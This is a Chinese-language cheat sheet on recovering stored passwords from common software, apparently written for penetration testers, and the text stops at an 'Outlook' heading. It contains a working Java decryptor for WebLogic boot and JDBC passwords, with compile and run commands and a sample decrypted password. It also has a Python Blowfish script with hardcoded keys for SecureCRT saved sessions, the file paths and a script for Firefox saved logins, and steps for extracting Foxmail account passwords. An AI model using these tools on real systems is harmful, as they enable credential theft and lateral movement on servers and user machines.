常用软件密码解密

Weblogic

  1. 登陆密码
  2. 数据库配置文件(Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import weblogic.security.internal.*;
import weblogic.security.internal.encryption.*;
/**
*
* 密码文件 Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties
* 密钥文件 Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat
*/
public class WebLogicDecryptor {
	private static ClearOrEncryptedService ces;
	public static void main(String[] args) throws Exception {
		if (args.length < 1) {
			throw new Exception("must set [domainDir] [encryptStr]");
		}
		ces = new ClearOrEncryptedService(
				SerializedSystemIni.getEncryptionService(args[0])); // your_domain
		System.out.println("Decrypted: " + ces.decrypt(args[1])); // {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=  12id9*@YNs0_q2dxwe
	}
}
  1. 设置环境变量
    base_domain\bin\setDomainEnv.cmd
  2. 编译
    javac WebLogicDecryptor.java
  3. 运行
    java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=

https://github.com/NetSPI/WebLogicPasswordDecryptor

1
2
javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java
java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="

补丁安装

1
2
3
./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view
./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir
./bsu.sh -install -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose

Firefox

nss3.dll路径
C:\Program Files (x86)\Mozilla Firefox\nss3.dll

火狐Profiles地址
C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default
cert8.db
key3.db
logins.json

ff_decrypt.py profilesfolder

SecureCRT

https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py

1
2
3
4
5
6
7
8
9
10
11
12
13
from Crypto.Cipher import Blowfish
def decrypt(password) :
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    p = ''
    while padded[:2] != '\x00\x00' :
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')
print decrypt("xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345");

Foxmail

版本小于 7.0 Foxmail\Storage\test@domain.com\Accounts\Account.stg
版本大于 7.0 Account.cfg

  1. Account.stg 文件可用工具破解。
  2. Account.cfg 格式的将Account目录复制到同版本Storage目录下,修改FMStorage.list文件添加新邮箱 Storage\test@domain.com\,启动客户端用星号密码查看器查看密码。

Outlook